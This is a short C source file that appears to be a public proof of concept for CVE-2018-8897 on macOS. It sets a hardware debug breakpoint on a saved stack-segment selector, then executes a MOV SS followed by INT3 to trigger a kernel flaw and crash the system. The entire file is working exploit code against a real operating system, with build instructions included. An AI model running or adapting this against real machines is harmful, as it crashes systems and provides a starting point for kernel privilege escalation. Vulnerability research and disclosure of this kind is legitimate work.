movss_osx_poc.m

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// mach
#include <mach/mach_types.h>
#include <mach/mach_init.h>
#include <mach/task.h>
#include <mach/mach_traps.h>
#include <mach/mach_interface.h>
#include <pthread.h>

/*
 Crash PoC for OSX (CVE-2018-8897)
 gcc movss_osx_poc.m -o movss_osx_poc -lpthread -F/System/Library/Frameworks/Kernel.framework
*/

unsigned short ss;

void set_breakpoint()
{
	thread_t mythread;
    x86_debug_state64_t dr;
    kern_return_t rc;
    mach_msg_type_number_t count = x86_THREAD_STATE64_COUNT;
	mythread = pthread_mach_thread_np(pthread_self());

    dr.__dr0 = (unsigned long)&ss;
    dr.__dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
    rc = thread_set_state(mythread, (thread_state_flavor_t)x86_DEBUG_STATE64, (thread_state_t)&dr, count);
    printf("set_state: %d\n",rc);
}

void vuln(){
    // set user gsbase on OSX -> https://gist.github.com/aras-p/5389747
    asm volatile("movl $0x3000003, %eax\n"
                 "movq $0xdeadbeef, %rdi\n"
                 "syscall\n"
                );

    // trigger vuln
    asm volatile ("mov %[ss], %%ss; .byte 0xcd, 0x3" :: [ss] "m" (ss));
}

int main(int argc, char *argv[])
{
	// saved ss
    asm volatile ("mov %%ss, %[ss]" : [ss] "=m" (ss));
    set_breakpoint();
    vuln();

}